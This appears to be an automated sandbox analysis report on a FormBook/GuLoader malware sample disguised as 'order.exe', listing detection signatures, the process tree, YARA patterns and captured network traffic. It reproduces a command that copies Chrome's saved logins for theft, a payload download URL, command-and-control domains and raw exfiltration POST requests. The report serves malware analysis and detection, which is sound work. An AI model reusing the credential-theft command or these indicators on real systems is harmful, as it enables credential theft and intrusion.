
Analysis Report order.exe.vir

Overview

General Information

Sample Name: order.exe.vir (renamed file extension from vir to exe)
MD5: 6ffa25db7a99e5438888579603d1d91f
SHA1: 3e15363d240a923eaa11165b31e9b4d879407f12
SHA256: 72eb2dc730e3574dcb204d37fcfb35cf91bacd8087d6028d743cb0992c874244


Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • order.exe.exe (PID: 4028 cmdline: 'C:\Users\user\Desktop\order.exe.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
    • order.exe.exe (PID: 5376 cmdline: 'C:\Users\user\Desktop\order.exe.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
      • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • control.exe (PID: 5904 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6040 cmdline: /c del 'C:\Users\user\Desktop\order.exe.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4944 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • olotql9xtrtpnd.exe (PID: 5528 cmdline: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe MD5: 6FFA25DB7A99E5438888579603D1D91F)
          • olotql9xtrtpnd.exe (PID: 4972 cmdline: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe MD5: 6FFA25DB7A99E5438888579603D1D91F)
        • olotql9xtrtpnd.exe (PID: 5944 cmdline: 'C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
          • olotql9xtrtpnd.exe (PID: 2432 cmdline: 'C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
        • olotql9xtrtpnd.exe (PID: 3856 cmdline: 'C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
          • olotql9xtrtpnd.exe (PID: 3780 cmdline: 'C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
        • help.exe (PID: 5712 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • help.exe (PID: 4000 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • rundll32.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18429:$sqlite3step: 68 34 1C 7B E1
      • 0x1853c:$sqlite3step: 68 34 1C 7B E1
      • 0x18458:$sqlite3text: 68 38 2A 90 C5
      • 0x1857d:$sqlite3text: 68 38 2A 90 C5
      • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18593:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\control.exe, ParentImage: C:\Windows\SysWOW64\control.exe, ParentProcessId: 5904, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 4944

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://149.255.36.133/bin_PqLAqQjAza233.bin | Avira URL Cloud: Label: malware
Source: http://149.255.36.133/bin_PqLAqQjAza233.bin/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://149.255.36.133/bin_PqLAqQjAza233.bin | Virustotal: Detection: 15%
Source: http://149.255.36.133/bin_PqLAqQjAza233.bin/ | Virustotal: Detection: 11%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Gmd1\olotql9xtrtpnd.exe | Virustotal: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\Gmd1\olotql9xtrtpnd.exe | ReversingLabs: Detection: 63%
Multi AV Scanner detection for submitted file
Source: order.exe.exe | Virustotal: Detection: 61%
Source: order.exe.exe | ReversingLabs: Detection: 63%
Yara detected FormBook
Source: Yara match | File source: 00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1583585086.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.1611465556.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2471801241.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1586527036.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.914633096.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2472989591.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1590005751.000000001F080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.1590663270.0000000002D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2471201439.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1581333071.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.1615263059.000000001F0A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.919876173.000000001EF20000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Gmd1\olotql9xtrtpnd.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: order.exe.exe | Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\order.exe.exe | Code function: 5x nop then xor edi, edi | 0_2_021824DD
Source: C:\Users\user\Desktop\order.exe.exe | Code function: 5x nop then xor edi, edi | 1_2_005624DD
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop ebx | 8_2_00567AC6
Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe | Code function: 5x nop then xor edi, edi | 17_2_020D24DD
Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe | Code function: 5x nop then xor edi, edi | 18_2_020524DD
Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe | Code function: 5x nop then xor edi, edi | 19_2_006E24DD
Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe | Code function: 5x nop then xor edi, edi | 20_2_005624DD
Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe | Code function: 5x nop then xor edi, edi | 21_2_005624DD

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.5:49733 -> 149.255.36.133:80
Source: Traffic | Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.5:49739 -> 149.255.36.133:80
Source: Traffic | Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.5:49740 -> 149.255.36.133:80
Source: Traffic | Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.5:49741 -> 149.255.36.133:80
Tries to resolve many domain names, but no domain seems valid
Source: unknown | DNS traffic detected: query: www.yfur.ltd replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.makeanexposure.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.phuquochomeland.com replaycode: Server failure (2)
Source: unknown | DNS traffic detected: query: www.trinetraclan.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.brifarroo.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.my-wifeandi.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.contactsweeper.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.antigennewburg.tech replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.fellowshipgreer.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.6882ss.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.digapony1427238.biz replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.uzmanserviscepte.net replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.shaueen.com replaycode: Name error (3)
Source: global traffic | HTTP traffic detected: GET /j4h/?M6Advpq=7t4HToMigGNwJPMQvt254oF1CV/eJdQMsFShHVoBivPn5D5h8CbCS8esBGhfsVKMtt2q&Lv=EN9tiz_Hl HTTP/1.1 | Host: www.topemailleads.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /j4h/?M6Advpq=H51V9duMqRnbj95D1MvvJ7i7VbIcWL9pj3QvEMEhOvjHnOj6szug+8ev4DeAite72oGg&Lv=EN9tiz_Hl HTTP/1.1 | Host: www.writusp.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1 | Host: www.hbyidong.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (9 identical entries)
Source: global traffic | HTTP traffic detected: GET /j4h/?M6Advpq=7t4HToMigGNwJPMQvt254oF1CV/eJdQMsFShHVoBivPn5D5h8CbCS8esBGhfsVKMtt2q&Lv=EN9tiz_Hl HTTP/1.1 | Host: www.topemailleads.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: unknown unknown (3 identical entries)
Source: global traffic | HTTP traffic detected: GET /bin_PqLAqQjAza233.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 149.255.36.133 | Cache-Control: no-cache (4 identical entries)
      Source: global trafficHTTP traffic detected: POST /j4h/ HTTP/1.1Host: www.writusp.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.writusp.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.writusp.com/j4h/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 36 41 64 76 70 71 3d 50 62 35 76 6a 37 66 36 71 58 4b 52 78 61 73 77 36 4a 61 43 4a 76 61 7a 53 35 31 4e 61 4c 5a 75 36 54 4e 39 51 38 77 42 4f 65 7a 37 32 71 72 79 75 68 76 57 39 4c 7a 4c 6b 44 58 34 36 59 36 71 33 36 58 53 42 48 51 45 68 68 56 5f 4d 50 48 30 4f 6c 52 53 35 49 33 4d 69 73 43 66 47 42 48 70 43 45 74 67 49 56 30 76 66 6b 64 71 6a 6b 32 6b 77 79 6c 66 73 44 67 6f 76 39 36 33 72 42 67 77 61 51 6c 44 69 4d 59 52 6d 59 49 61 4b 44 30 6c 4f 64 79 52 58 65 6e 5a 49 48 6a 69 4b 74 4c 53 34 74 4e 63 39 4f 73 76 31 65 5a 75 7e 67 6e 52 30 6c 65 66 61 61 79 59 34 2d 57 70 42 39 63 66 35 33 75 47 74 37 55 66 50 59 65 4f 52 65 47 72 5a 52 28 56 42 77 47 51 7e 7a 7e 61 55 53 45 36 37 74 62 43 6d 75 4b 57 30 49 4d 5f 56 45 74 52 6b 2d 7a 53 4b 63 63 77 35 53 59 77 35 37 74 64 55 31 78 74 67 70 53 2d 70 6d 54 52 38 6c 70 61 48 78 43 41 67 7a 6b 32 64 46 58 73 47 31 4d 58 6c 68 69 43 4b 4d 6d 59 52 54 4f 33 79 73 76 76 7a 73 47 68 33 43 44 36 43 63 7e 41 4e 30 30 58 59 58 71 5f 4e 30 61 5a 61 67 74 76 66 53 39 42 46 6c 58 4c 45 34 63 74 30 66 77 35 6e 7a 76 69 49 45 71 37 67 72 34 6d 55 43 58 76 65 4c 4b 56 5a 44 57 4b 53 30 48 79 73 53 79 45 4c 6d 77 6b 31 53 49 6b 30 59 35 68 37 75 32 5f 71 78 6e 4c 42 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
M6Advpq=Pb5vj7f6qXKRxasw6JaCJvazS51NaLZu6TN9Q8wBOez72qryuhvW9LzLkDX46Y6q36XSBHQEhhV_MPH0OlRS5I3MisCfGBHpCEtgIV0vfkdqjk2kwylfsDgov963rBgwaQlDiMYRmYIaKD0lOdyRXenZIHjiKtLS4tNc9Osv1eZu~gnR0lefaayY4-WpB9cf53uGt7UfPYeOReGrZR(VBwGQ~z~aUSE67tbCmuKW0IM_VEtRk-zSKccw5SYw57tdU1xtgpS-pmTR8lpaHxCAgzk2dFXsG1MXlhiCKMmYRTO3ysvvzsGh3CD6Cc~AN00XYXq_N0aZagtvfS9BFlXLE4ct0fw5nzviIEq7gr4mUCXveLKVZDWKS0HysSyELmwk1SIk0Y5h7u2_qxnLBQ).
      Source: global trafficHTTP traffic detected: POST /j4h/ HTTP/1.1Host: www.writusp.comConnection: closeContent-Length: 155857Cache-Control: no-cacheOrigin: http://www.writusp.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.writusp.com/j4h/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 36 41 64 76 70 71 3d 50 62 35 76 6a 36 6d 42 6f 48 50 4b 67 66 78 4e 34 36 32 76 64 4f 6a 56 43 5a 68 4a 64 6f 6c 41 6d 52 4a 54 51 38 67 46 46 37 44 54 67 36 37 79 73 6a 58 52 35 72 7a 55 69 44 58 5f 72 49 28 54 72 64 72 61 42 47 6c 6a 68 68 64 77 43 65 33 31 4f 56 52 4a 36 6f 79 31 67 73 58 44 47 43 79 4c 43 6d 68 34 4e 56 34 76 41 6b 56 53 36 6c 6d 6a 35 54 70 51 77 6e 49 74 74 38 54 6e 72 52 4d 59 56 57 73 7a 72 75 73 54 30 35 73 76 45 69 46 79 4b 4f 53 65 5a 76 43 54 52 45 66 78 55 38 58 57 28 73 4d 6a 6a 66 73 73 71 36 31 73 72 51 58 7a 34 30 61 6d 64 61 6a 5f 34 39 32 66 47 50 35 62 39 30 61 4f 76 49 42 77 62 61 79 4d 4e 66 47 6a 64 54 6e 6e 44 77 32 76 38 33 75 52 46 78 41 4b 38 6f 66 6f 72 72 6d 48 6b 70 77 6a 4e 46 78 74 67 74 66 4b 56 76 45 50 78 31 6c 77 69 34 31 56 58 77 70 4c 6c 4a 53 64 76 6d 54 56 7a 45 59 76 43 55 37 4d 67 67 73 55 5a 46 76 35 43 6b 67 55 70 44 57 65 45 4d 65 5a 53 69 57 37 71 73 50 62 69 2d 71 75 78 6c 72 5a 4b 38 28 65 44 57 63 69 59 58 71 37 4e 77 4f 5f 61 55 6c 76 65 41 30 61 44 43 43 45 47 34 63 4b 32 50 41 37 73 6b 76 79 49 43 43 37 75 2d 38 41 56 78 48 76 61 5a 69 53 59 69 57 4b 54 6b 48 79 33 69 7a 75 48 31 45 76 33 33 73 43 30 71 39 67 30 61 4c 4e 71 31 79 6e 66 69 6e 39 55 62 57 35 6b 53 6b 30 57 4d 70 51 4b 6f 4a 57 35 38 46 32 62 70 76 41 66 54 77 46 6f 56 45 5a 4e 4f 56 68 43 49 33 39 75 44 65 69 6a 2d 63 62 46 46 64 39 31 72 45 34 68 53 4b 75 33 45 32 77 70 58 70 5f 48 42 53 56 4c 70 39 70 6f 77 52 44 44 2d 39 4c 77 71 44 36 69 4e 79 47 39 50 79 50 4e 75 73 68 68 52 4e 34 43 6a 49 70 74 68 52 51 5a 
4c 6b 61 76 45 49 70 43 5a 59 42 61 4e 42 54 45 56 77 6d 70 69 66 55 41 70 42 2d 6a 76 34 38 4e 72 73 31 6c 34 34 66 7a 35 44 6e 45 51 32 78 75 35 6c 55 46 44 62 67 45 34 33 67 30 62 50 77 62 4d 46 74 47 51 59 77 76 6d 64 69 50 37 69 76 78 4e 73 38 77 42 37 61 55 7a 4d 77 4f 6a 6f 44 4a 69 4b 48 32 62 6f 77 59 44 67 6f 43 34 54 5a 57 33 51 70 67 4c 69 54 67 6a 62 72 63 4b 51 37 61 79 34 34 36 4a 66 63 74 41 55 41 30 7a 47 5a 28 79 36 37 32 36 46 46 51 31 56 64 52 44 51 43 75 2d 28 58 77 38 37 66 30 7a 46 77 72 5a 6a 51 41 35 43 65 39 6b 4e 72 7a 35 70 58 43 73 67 6f 49 51 41 65 67 50 51 63 56 55 43 68 7a 6e 78 64 5a 31 64 55 37 45 6d 50 48 6d 51 4b 30 59 65 4e 7e 37 37 35 64 57 33 41 77 30 34 70 36 34 6a 36 6b 37 4d 50 76 5a 44 73 65 34 68 55 38 68 6b 72 4f 4d 37 4d 42 47 49 70 46 72 71 76 41 5a 36 45 47 6b 6f 44 31 5f 33 5a 35 44 66 73 63 44 48 67 79 62 56 78 31 6c 34 33 66 51 75 71 65 32 4b 63 36 74 32 48 46 69 6e 72 31 47 48 44 59 2d 7e 4d 71 44 53 53 59 59 66 62 58 6a 77 4d 35 4e 67 57 6b 36 66 6c 64 6e 50 4
      Source: global trafficHTTP traffic detected: POST /j4h/ HTTP/1.1Host: www.hbyidong.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.hbyidong.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hbyidong.com/j4h/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 36 41 64 76 70 71 3d 6a 64 34 37 61 62 6f 45 47 4c 62 36 51 6a 66 76 6b 77 6d 51 68 62 68 6f 68 39 71 77 47 51 71 37 55 5f 46 79 6c 4c 68 4c 42 53 6a 78 30 6d 6d 66 38 6f 28 39 56 74 33 48 70 4c 35 42 73 30 4d 4f 64 42 44 70 33 4f 66 44 46 4c 49 6c 6f 41 70 59 45 56 50 56 44 6b 6d 46 65 42 4d 46 69 34 56 34 5a 6b 43 59 74 39 31 70 6d 64 64 68 74 56 65 4c 4b 51 73 79 56 35 63 41 4f 64 43 41 75 44 4e 6a 62 62 68 68 68 58 58 38 44 64 57 57 46 33 66 54 61 32 52 6d 46 4a 57 47 4e 6e 61 6e 69 5a 73 67 57 41 54 4a 54 44 7e 4d 41 6e 4b 71 51 51 4d 44 47 76 31 38 6a 43 6c 4d 39 73 56 46 79 49 31 71 64 73 63 43 30 63 6f 54 78 4e 6a 63 48 41 78 63 75 6d 31 39 4f 77 6d 4e 58 58 43 38 50 57 44 32 46 4a 53 30 79 74 47 4d 35 50 55 59 70 2d 43 37 37 41 70 70 56 71 68 4f 4f 2d 67 37 4a 34 4d 70 48 71 69 42 58 4d 62 76 44 58 6c 7a 5a 58 67 39 4d 49 34 31 76 75 36 69 79 79 32 36 4a 53 62 42 39 73 63 68 33 6a 45 58 6b 66 68 33 36 53 55 72 75 53 77 59 68 7a 73 61 35 63 6b 37 61 7a 7a 41 6e 67 45 76 33 4b 70 45 4b 5a 32 72 62 4d 31 4e 47 32 56 5a 33 34 37 32 7a 42 78 4b 6b 51 54 4e 74 32 32 6b 57 61 54 57 7a 67 34 68 5a 64 55 74 7e 75 69 6e 68 2d 74 79 34 48 4e 4b 47 38 43 44 73 71 63 69 5a 36 6d 5f 33 41 7e 47 62 4b 69 32 53 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
M6Advpq=jd47aboEGLb6QjfvkwmQhbhoh9qwGQq7U_FylLhLBSjx0mmf8o(9Vt3HpL5Bs0MOdBDp3OfDFLIloApYEVPVDkmFeBMFi4V4ZkCYt91pmddhtVeLKQsyV5cAOdCAuDNjbbhhhXX8DdWWF3fTa2RmFJWGNnaniZsgWATJTD~MAnKqQQMDGv18jClM9sVFyI1qdscC0coTxNjcHAxcum19OwmNXXC8PWD2FJS0ytGM5PUYp-C77AppVqhOO-g7J4MpHqiBXMbvDXlzZXg9MI41vu6iyy26JSbB9sch3jEXkfh36SUruSwYhzsa5ck7azzAngEv3KpEKZ2rbM1NG2VZ3472zBxKkQTNt22kWaTWzg4hZdUt~uinh-ty4HNKG8CDsqciZ6m_3A~GbKi2SQ).
      Source: global trafficHTTP traffic detected: POST /j4h/ HTTP/1.1Host: www.hbyidong.comConnection: closeContent-Length: 155857Cache-Control: no-cacheOrigin: http://www.hbyidong.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hbyidong.com/j4h/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 36 41 64 76 70 71 3d 6a 64 34 37 61 66 30 58 45 62 66 72 62 78 33 52 73 68 79 35 35 62 4a 75 74 74 75 6b 5a 54 58 43 64 49 64 69 6c 50 6c 58 55 6a 7a 6a 78 47 57 66 36 74 54 36 4e 64 33 45 67 72 35 43 6f 30 49 79 64 51 6e 58 33 4b 48 39 46 4c 41 6d 6d 6d 74 64 48 46 50 43 44 45 6a 30 59 43 77 6b 69 35 6c 42 5a 48 75 4c 6f 39 35 70 72 4a 78 6a 69 55 4f 4d 44 78 77 4c 4c 35 41 46 49 66 79 56 75 7a 77 44 63 4f 70 58 6d 56 7a 2d 55 50 4c 61 5a 47 50 37 4e 57 6f 6d 61 74 28 4d 55 51 4b 30 28 75 30 6b 59 69 33 37 50 53 7e 50 44 52 69 73 56 54 6b 68 4b 37 74 46 68 58 73 39 39 71 78 5f 6d 4c 78 47 57 50 6f 77 32 4e 30 31 36 63 6e 65 43 7a 30 5a 6b 41 67 62 4d 31 75 79 62 32 79 64 59 32 28 6e 41 4c 61 6b 39 73 65 5f 31 61 34 55 68 72 6e 4d 32 32 4a 78 4b 5f 70 68 44 59 67 67 65 63 41 78 41 70 4f 72 4a 63 62 55 46 58 6c 33 57 30 34 4a 49 65 49 75 75 39 79 41 32 7a 7e 6a 4f 44 48 41 7e 75 6f 6c 7a 43 51 61 70 4c 70 37 69 31 41 54 71 7a 30 66 6e 51 77 54 7a 38 6c 6c 4e 68 62 4c 6e 67 45 6a 33 50 52 71 4c 73 6d 72 61 64 55 54 4b 33 56 56 28 59 37 52 31 53 4a 79 7a 58 72 64 74 31 47 6b 58 6f 4c 38 77 33 6b 68 65 4f 4d 75 28 4b 57 6e 68 4f 74 79 78 6e 4d 42 4f 4d 44 6f 74 4d 45 34 64 59 50 47 32 30 50 54 59 36 37 6c 44 68 53 42 6e 5a 48 78 75 42 75 64 55 77 44 2d 42 58 32 6a 69 39 77 32 51 58 54 70 45 66 38 51 67 5a 33 59 56 46 35 79 5a 42 35 56 47 36 70 35 41 4d 4a 47 38 77 76 43 4c 5f 6d 38 41 72 33 45 67 4a 37 4f 43 33 71 71 53 43 55 42 28 6c 52 44 59 6f 70 71 7a 41 6a 6f 44 6b 33 73 33 45 55 6c 76 73 31 43 52 55 75 56 64 4f 70 64 41 37 6a 78 28 78 67 68 
77 36 33 78 55 75 54 39 73 73 6a 32 6a 63 6e 34 6d 6e 35 4b 61 36 65 4c 4d 5a 33 5a 64 7a 73 42 56 52 72 61 66 39 65 6a 66 32 30 57 6e 75 74 37 67 49 51 45 72 57 30 34 52 6c 63 4e 37 48 6f 44 4e 74 63 53 39 2d 74 6b 30 31 56 4c 46 67 5a 36 55 75 6e 53 72 37 6d 57 58 65 6c 74 6f 62 6d 77 37 45 4d 36 68 6f 56 79 63 4f 66 73 5a 30 74 70 57 79 6f 36 47 44 5a 6f 4d 43 65 54 72 76 5a 5f 34 5f 76 46 53 37 34 70 6d 42 55 49 50 76 71 7a 34 44 42 58 43 56 50 51 65 41 4f 6e 66 67 68 4e 66 76 4e 6a 66 44 75 74 79 63 62 4e 4c 34 70 69 70 46 7a 68 36 70 32 46 31 53 78 6d 7e 75 52 62 28 34 62 35 62 4c 51 72 64 75 6f 6a 69 53 52 73 76 43 41 74 56 51 55 69 45 33 48 4a 45 62 63 63 63 74 4d 48 6c 4a 4f 64 74 79 46 49 63 43 32 42 5a 75 59 49 39 32 7a 6f 63 37 66 76 4f 75 6f 5f 61 65 79 68 49 36 32 35 67 38 49 32 74 4f 4c 67 4a 70 46 59 62 75 61 31 78 4d 4e 48 4a 51 71 35 75 77 6a 66 78 32 66 68 74 7a 77 41 46 6b 56 39 34 37 4e 70 34 6a 75 72 5a 31 72 52 75 69 68 52 70 35 54 56 33 6b 43 47 31 73 31 6d 63 75 77 67 